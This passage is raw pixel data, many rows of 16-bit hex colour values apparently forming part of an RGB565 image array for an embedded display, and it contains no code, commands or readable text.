0xffff, 0xffff, 0x52aa, 0x9492, 0xce79, 0xce59, 0xce58, 0xc638, 0xc638, 0xc638, 0xc638, 0xce58, 0xc638, 0xce38, 0xce58, 0xc638, 0xc638, 0xce38, 0xce59, 0xc638, 0xce58, 0xce58, 0xc638, 0xc638, 0xce58, 0xce58, 0xc638, 0xc638, 0xce58, 0xc638, 0xc618, 0xc638, 0xc638, 0xbdf7, 0xc638, 0x52aa, 0xf7be, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0x7bef, 0x4a48, 0x52aa, 0x52aa, 0x52aa, 0x4a69, 0x52aa, 0x5289, 0x52aa, 0x630b, 0xf7be, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0x31a6, 0x2124, 0x31c7, 0x31a7, 0x2145, 0x2145, 0x2145, 0x31a7, 0x2145, 0x2145, 0x0041, 0xc618, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7be, 0xffff, 0xe73c, 0xffff, 0xf79e, 0xf79e, 0xf7be, 0xffff, 0xffff, 0xf7be, 0xf7be, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xf79e, 0xffff, 0xf79e, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7be, 0xffff, 0xffff, 0xd6ba, 0xdedb, 0xdedb, 0xdedb, 0xdedb, 0xdefb, 0xdedb, 0xdefb, 0xdedb, 0xdedb, 0xdedb, 0xdedb, 0xdedb, 0xdedb, 0xdefb, 0xdebb, 0xdedb, 0xdedb, 0xdedb, 0xdefb, 0xdedb, 0xdedb, 0xdedb, 0xdedb, 0xdefb, 0xdedb, 0xdedb, 0xdefb, 0xe71c, 0xdefb, 0xdefb, 0xce79, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf79e, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x31a6, 0x18e3, 0x2125, 0x2145, 0x2145, 0x1904, 0x1924, 0x2125, 0x2124, 0x2125, 0x0041, 0xad76, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0x738e, 0x18c3, 0x3186, 0x2965, 0x2965, 0x2965, 0x3186, 0x2945, 0x2124, 0x2945, 0x2965, 0x2965, 0x2965, 0x2945, 0x2965, 0x2945, 0x2945, 0x2965, 0x2945, 0x2945, 0x2965, 0x3186, 0x2124, 0x2965, 0x31a6, 0x3186, 0x18c3, 0x8410, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf79e, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7be, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf79e, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7be, 0xffde, 0xffff, 0xf7be, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7be, 0x31a6, 0x10a2, 0x1904, 0x1924, 0x1904, 0x2145, 0x2125, 0x18e4, 0x18e4, 0x1904, 0x0841, 0x9cf3, 0xffdf, 0xf7be, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xd6ba, 0x8c71, 0x94b2, 0x9cd3, 0x9cf3, 0x94b2, 0x94b2, 0x9cf3, 0x9cf3, 0x9cf3, 0x9cd3, 0x94b2, 0x9cf3, 0x9cd3, 0x9cd3, 0x9cd3, 0x9cf3, 0x9cd3, 0x9cd3, 0x9cf3, 0x9cd3, 0x9cf3, 0x9cf3, 0x94b2, 0x9cd3, 0x9cf3, 0x9cd3, 0xe73c, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7be, 0xffff, 0xffdf, 0xffff, 0xf79e, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffde, 0xffff, 0xffff, 0xffff, 0xf7be, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0x2945, 0x18e3, 0x2124, 0x18e4, 0x2124, 0x18e4, 0x1904, 0x18e4, 0x2104, 0x2104, 0x0041, 0x94b3, 0xef9e, 0xf7be, 0xffff, 0xffff, 0xf79e, 0xce79, 0xd6ba, 0xce59, 0xce79, 0xd69a, 0xce59, 0xd6ba, 0xc638, 0xd6ba, 0xdefb, 0xe71c, 0xd6ba, 0xe71c, 0xd6ba, 0xef5d, 0xd69a, 0xe73c, 0xdedb, 0xe71c, 0xdefb, 0xdefb, 0xdedb, 0xdefb, 0xe73c, 0xdedb, 0xe73c, 0xd69a, 0xe73c, 0xd6ba, 0xdefb, 0xdefb, 0xe73c, 0xdefb, 0xc638, 0xd69a, 0xc638, 0xce79, 0xc618, 0xce59, 0xc638, 0xce79, 0xd6ba, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7be, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7be, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x2965, 0x0861, 0x18e3, 0x1904, 0x1904, 0x18e3, 0x18e3, 0x18e3, 0x18c3, 0x18e3, 0x0000, 0x8c51, 0xef7e, 0xffff, 0xffff, 0xffff, 0xce79, 0xa514, 0x9492, 0x9cd3, 0x9cd3, 0x94b2, 0x9cd3, 0x9492, 0x94b2, 0x9cd3, 0x94b2, 0x9cd3, 0xa514, 0x8c71, 0xa514, 0x8c51, 0xa514, 0x9492, 0xa514, 0x8c51, 0xa514, 0x8c71, 0xa514, 0x94b2, 0x9492, 0x9cd3, 0x9492, 0x9cf3, 0x94b2, 0x9cd3, 0x8c71, 0x9cf3, 0x94b2, 0x94b2, 0xa534, 0xa534, 0xa534, 0x9cf3, 0xad55, 0xad55, 0x9cd3, 0xad75, 0xad75, 0xef5d, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xe73c, 0xffff, 0xd6ba, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xdedb, 0xffff, 0xffff, 0xffff, 0xdefb, 0xffff, 0xef7d, 0xf7be, 0xffff, 0xffff, 0xffff, 0xdedb, 0xffff, 0xffdf, 0xef7d, 0xe71c, 0xffff, 0xf7be, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x5aeb, 0x1082, 0x10a3, 0x10a2, 0x1082, 0x1082, 0x1082, 0x1082, 0x10a2, 0x0861, 0x18c3, 0x9cf4, 0xffdf, 0xffff, 0xffff, 0xf79e, 0xc618, 0xa514, 0x8c71, 0x9cf3, 0xa514, 0x94b2, 0x9cf3, 0xa534, 0x94b2, 0xa514, 0x94b2, 0x9cf3, 0x8c71, 0xa534, 0x9492, 0xa534, 0x94b2, 0x9cf3, 0x9cd3, 0xa514, 0x94b2, 0x9cf3, 0x94b2, 0xa514, 0x9cf3, 0x9cf3, 0x9cd3, 0x9cd3, 0xa534, 0x9cf3, 0xa514, 0x8c71, 0x9cd3, 0xa514, 0xb596, 0x9cf3, 0xa535, 0x9cd3, 0xa514, 0x9cf3, 0x9cf3, 0xa514, 0xbdd7, 0xd6ba, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xd6ba, 0x8410, 0xc638, 0xb596, 0x8c71, 0xbdf7, 0x8410, 0xf7be, 0xb596, 0xa534, 0xb5b6, 0xd69a, 0x94b2, 0xef5d, 0xffff, 0xef7d, 0x9cd3, 0xffff, 0x7bcf, 0xa534, 0x9cf3, 0xa534, 0xffff, 0xad35, 0xc618, 0xad55, 0xd69a, 0xad34, 0xa514, 0xef7d, 0xf7be, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0x7c0f, 0x9cf3, 0x9cd3, 0x8c51, 0x8c71, 0x8c51, 0x8c71, 0x8431, 0x7bf0, 0xa514, 0x7bcf, 0x9cd3, 0xffff, 0xffdf, 0xffff, 0xe73c, 0xce59, 0x9cd3, 0x9cf3, 0x9cf3, 0xa514, 0xad55, 0xa534, 0xad55, 0x9cf3, 0xa534, 0xad75, 0x9cf3, 0xb596, 0x9cf3, 0xb596, 0xa514, 0xad55, 0xad55, 0xad55, 0xa534, 0xad75, 0x9cd3, 0xad75, 0x94b3, 0xad55, 0xa514, 0xa535, 0xa535, 0x9cf4, 0xa534, 0x9cf4, 0xa534, 0x9cf4, 0xa514, 0xbdf7, 0xad75, 0x9cf3, 0xa534, 0xa534, 0xa514, 0xad55, 0x9cd3, 0xbdd7, 0xdedb, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xdefb, 0x94b2, 0xc618, 0xc638, 0xce59, 0x9cd3, 0xdedb, 0xffff, 0xef7d, 0xef7d, 0xef5d, 0xad55, 0x9492, 0x94b2, 0xd69a, 0xa514, 0xc618, 0x8430, 0xb5b6, 0xce79, 0xad75, 0xe73c, 0xef5d, 0xc638, 0xce38, 0xd69a, 0xbdd7, 0xc618, 0xad55, 0xf7be, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
